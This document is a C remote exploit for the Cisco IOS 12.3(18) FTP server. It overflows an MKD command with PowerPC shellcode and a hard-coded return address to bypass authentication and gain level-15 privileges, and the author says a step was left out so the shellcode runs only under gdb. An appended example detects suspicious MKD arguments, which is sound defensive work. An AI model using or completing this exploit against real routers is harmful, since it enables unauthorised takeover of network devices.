Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)
/* Cisco IOS FTP server remote exploit by Andy Davis 2008

   Cisco Advisory ID: cisco-sa-20070509-iosftp - May 2007

   Specific hard-coded addresses for IOS 12.3(18) on a 2621XM router

   Removes the requirement to authenticate and escalates to level 15

   *********************************************************************
   To protect the innocent a critical step has been omitted, which means
   the shellcode will only execute when the router is attached to gdb.
   I'm sure the PowerPC shellcoders out there will work it out...
   *********************************************************************

   Thanks to Gyan Chawdhary and Varun Uppal for all the hours they spent
   on the original IOS security research

   iosftpexploit googlemail 'dot' com */

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define PORT 21

int main(int argc, char **argv)
{
    unsigned char sendbuf[] =
        "MKD "

        /* .equ vty_info, 0x8182da60   # pointer to VTY info */
        /* .equ terminate, 0x80e4086c  # kill a process */

        "\x3c\x80\x81\x83" /* lis 4,vty_info@ha */
        "\x38\x84\xda\x60" /* la 4,vty_info@l(4) */
        "\x7d\x08\x42\x78" /* xor 8,8,8 */
        "\x7c\xe4\x40\x2e" /* lwzx 7,4,8 */
        "\x91\x07\x01\x74" /* stw 8,372(7) */
        "\x39\x08\xff\xff" /* subi 8,8,1 */
        "\x38\xe7\x09\x1a" /* addi 7,7,233 */
        "\x91\x07\x04\xca" /* stw 8,1226(7) */
        "\x7d\x03\x43\x78" /* mr 3,8 */
        "\x3c\x80\x80\xe4" /* lis 4,terminate@ha */
        "\x38\x84\x08\x6c" /* la 4,terminate@l(4) */
        "\x7c\x89\x03\xa6" /* mtctr 4 */
        "\x4e\x80\x04\x20" /* bctr */

        /* exits cleanly without adversely affecting the FTP server */

        "\x61\x61\x61\x61" /* padding */
        "\x61\x61\x61\x61" /* padding */
        "\x61\x61\x61\x61" /* padding */
        "\x61\x61\x61\x61" /* padding */
        "\x61\x61\x61\x61" /* padding */
        "\x61\x61\x61\x61" /* padding */

        "\x80\x06\x23\xB8" /* return address */
        "\x0d\x0a";

    /* trampoline code */
    /* when the overflow occurs r26+0x14 points to the shellcode */
    /*
       0x800623B8 lwz 26, 20(26)
       0x800623BC mtctr 26
       0x800623C0 mr 3, 27
       0x800623C4 bctrl
    */

    unsigned char recvbuf[256];
    struct sockaddr_in servaddr;
    int s;

    if (argc != 2)
    {
        printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n");
        printf ("\nUsage: %s \n", argv[0]);
        exit(-1);
    }

    servaddr.sin_family = AF_INET;
    servaddr.sin_addr.s_addr = inet_addr(argv[1]);
    servaddr.sin_port = htons(PORT);

    s = socket(AF_INET, SOCK_STREAM, 0);
    connect (s, (struct sockaddr *) &servaddr, sizeof(servaddr));

    printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n");
    printf ("Specific offsets for IOS 12.3(18) on a 2621XM router\n\n");
    printf ("Sending exploit...\n\n");

    if (send(s, sendbuf, sizeof(sendbuf)-1, 0) == 0)
    {
        printf("Error sending packet...quitting\n\n");
        exit(1);
    }

    recv (s, recvbuf, sizeof(recvbuf)-1, 0);
    printf ("Now telnet to the router for a shell...\n\n");
}
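The listing above delivers its payload as the argument of a single MKD command, so the request is recognisable on the FTP control channel. The following check is an added example, not part of the original exploit or of any Cisco code: it flags an MKD line whose argument contains bytes outside printable ASCII or is unusually long. The function name, verdict names and the 64-byte threshold are assumptions chosen for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Added example: names and thresholds are illustrative assumptions. */
#define MKD_MAX_ARG 64  /* assumed upper bound for a sane directory name */

enum mkd_verdict { MKD_NOT_MKD, MKD_OK, MKD_TOO_LONG, MKD_BINARY };

/* Inspect one FTP control-channel line. The length is passed explicitly
 * because a hostile line may contain any byte value, including NUL. */
enum mkd_verdict inspect_mkd(const unsigned char *line, size_t len)
{
    size_t i;

    /* Drop the trailing CR/LF so it is not counted as argument data. */
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;

    /* FTP verbs are case-insensitive; the verb is followed by a space. */
    if (len < 4 || strncasecmp((const char *)line, "MKD ", 4) != 0)
        return MKD_NOT_MKD;

    /* Machine code or addresses embedded in a path appear as bytes
     * outside the printable ASCII range 0x20-0x7e. */
    for (i = 4; i < len; i++)
        if (line[i] < 0x20 || line[i] > 0x7e)
            return MKD_BINARY;

    return (len - 4) > MKD_MAX_ARG ? MKD_TOO_LONG : MKD_OK;
}

int main(void)
{
    /* Constructed sample lines, not captured traffic. */
    static const unsigned char benign[]  = "MKD reports\r\n";
    static const unsigned char hostile[] = "MKD \x80\x01\x02zz\r\n";

    printf("benign:  %d\n", inspect_mkd(benign, sizeof benign - 1));
    printf("hostile: %d\n", inspect_mkd(hostile, sizeof hostile - 1));
    return 0;
}
```

A server that legitimately accepts UTF-8 directory names would need a wider allow-list than the ASCII range used here.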
